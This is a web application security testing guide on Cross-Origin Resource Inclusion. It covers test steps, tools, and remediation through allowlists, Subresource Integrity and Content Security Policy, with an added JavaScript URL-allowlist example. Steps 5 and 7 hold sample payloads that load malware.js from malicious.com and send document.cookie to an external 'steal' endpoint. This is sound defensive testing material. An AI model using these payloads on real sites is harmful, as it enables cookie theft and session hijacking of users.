## Description
Cross-Origin Resource Inclusion (CORI) vulnerabilities occur when a web application allows external resources (e.g., scripts, stylesheets, or images) to be included or loaded from untrusted sources. This can lead to unauthorized data exfiltration, execution of malicious scripts, or other security issues.

## Objective
To identify and exploit scenarios where an application improperly includes cross-origin resources, enabling attackers to inject malicious resources or exfiltrate sensitive data.
## Test Steps
1. **Inspect the application for externally loaded resources**, such as:
   - JavaScript files
   - CSS files
   - Images
   - Fonts
2. **Analyze resource loading mechanisms**:
   - Dynamic imports (e.g., `import()`, `require()`)
   - DOM manipulation methods (e.g., `createElement('script')`, `appendChild()`)
3. **Check the application for hardcoded external URLs in**:
   - HTML tags (`<script>`, `<link>`, `<img>`)
   - Inline JavaScript
   - API calls that dynamically load resources
4. **Review how external resource URLs are validated**:
   - Are URLs dynamically constructed using user input?
   - Is validation performed to restrict sources?
5. **Inject Malicious External Resources**:
   - Replace external resource URLs with attacker-controlled URLs:
     ```html
     <script src="https://malicious.com/malware.js"></script>
     ```
6. **Manipulate Dynamic Imports**:
   - Test if user-controlled input affects dynamically loaded resources:
     ```javascript
     const script = document.createElement('script');
     script.src = userInput; // check whether user-controlled input reaches the src attribute
     document.body.appendChild(script);
     ```
7. **Analyze for Data Exfiltration**:
   - Inject resources that attempt to exfiltrate sensitive data:
     ```javascript
     // Resource whose URL carries page data (here the cookie) to an external host
     const img = document.createElement('img');
     img.src = 'https://malicious.com/steal?cookie=' + document.cookie;
     document.body.appendChild(img);
     ```
   - Confirm if the application includes and executes the malicious resource.
   - Assess the impact, such as:
     - Unauthorized data exfiltration (e.g., cookies, tokens).
     - Execution of malicious scripts.
     - Integrity compromise through CSS or DOM manipulation.
## Tools
- Browser Developer Tools for inspecting included resources.
- Burp Suite or OWASP ZAP for intercepting and modifying requests.
- Custom JavaScript payloads to manipulate resource inclusion dynamically.
- cURL or Postman for testing resource URLs.
## Remediation
1. **Validate and Restrict Included Resources**:
   - Implement a strict allowlist of trusted domains for resource inclusion.
   - Avoid dynamically constructing resource URLs using user input.
2. **Use Subresource Integrity (SRI)**:
   - Add `integrity` attributes to `<script>` and `<link>` tags to ensure resources are not tampered with (`sha384-xyz` stands in for the real base64-encoded digest of the file):
     ```html
     <script src="https://example.com/script.js" integrity="sha384-xyz" crossorigin="anonymous"></script>
     ```
3. **Enforce Content Security Policy (CSP)**:
   - Restrict allowed sources for scripts, styles, and other resources using CSP:
     ```http
     Content-Security-Policy: script-src 'self' https://trusted.com;
     ```
4. **Regularly Audit Included Resources**:
   - Periodically review and verify all external resources for security and reliability.
5. **Avoid Inline Resource Loading**:
   - Minimize the use of inline resource inclusion to reduce potential attack vectors.
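As an added example (not code from the original page), the allowlist check from remediation items 1 and 2 combined with the SRI pinning from item 2: a candidate URL is parsed and its origin compared exactly against trusted origins before any element is built. The trusted origins, the `app.js` path and the `sha384-PLACEHOLDER` digest are assumed placeholders.

```javascript
// Added example: origin allowlist for externally included resources.
// ALLOWED_ORIGINS and KNOWN_INTEGRITY are constructed placeholders.
const ALLOWED_ORIGINS = new Set([
  'https://cdn.example.com',
  'https://static.example.com',
]);

// Pinned SRI digests for known files; 'sha384-PLACEHOLDER' is not a real hash.
const KNOWN_INTEGRITY = new Map([
  ['https://cdn.example.com/lib/app.js', 'sha384-PLACEHOLDER'],
]);

// Returns the normalised absolute URL if acceptable, otherwise null.
// Checking the parsed origin (not a string prefix) rejects look-alikes such as
// "https://cdn.example.com.evil.net", protocol-relative "//evil.net/x.js"
// and userinfo confusion like "https://cdn.example.com@evil.net/x.js".
function resolveAllowedResourceUrl(candidate, allowedOrigins = ALLOWED_ORIGINS) {
  let url;
  try {
    url = new URL(String(candidate)); // relative or malformed input throws
  } catch {
    return null;
  }
  if (url.protocol !== 'https:') return null;       // no http:, data:, javascript:
  if (url.username || url.password) return null;    // reject embedded credentials
  if (!allowedOrigins.has(url.origin)) return null; // exact origin match only
  return url.href;
}

// Builds a <script> element only for an allowed URL, adding SRI when a digest
// is pinned. Needs a browser DOM, so it is not exercised under Node.
function createTrustedScript(candidate) {
  const href = resolveAllowedResourceUrl(candidate);
  if (href === null) {
    throw new Error('Refusing to include resource from an untrusted source');
  }
  const script = document.createElement('script');
  script.src = href;
  const digest = KNOWN_INTEGRITY.get(href);
  if (digest) {
    script.integrity = digest;
    script.crossOrigin = 'anonymous';
  }
  return script;
}

// Constructed sample inputs of the kind a tester feeds through a user-controlled parameter.
for (const s of ['https://cdn.example.com/lib/app.js', 'https://cdn.example.com.evil.net/x.js',
                 '//cdn.example.com/x.js', 'https://cdn.example.com@evil.net/x.js']) {
  console.log(s, '->', resolveAllowedResourceUrl(s));
}
```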
---
## References
- [OWASP Testing Guide - CORI Testing](https://owasp.org/www-project-testing/)
- [MDN Web Docs - Content Security Policy (CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
- [OWASP Top Ten - A05:2021 Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)
- [W3C - Subresource Integrity](https://www.w3.org/TR/SRI/)
---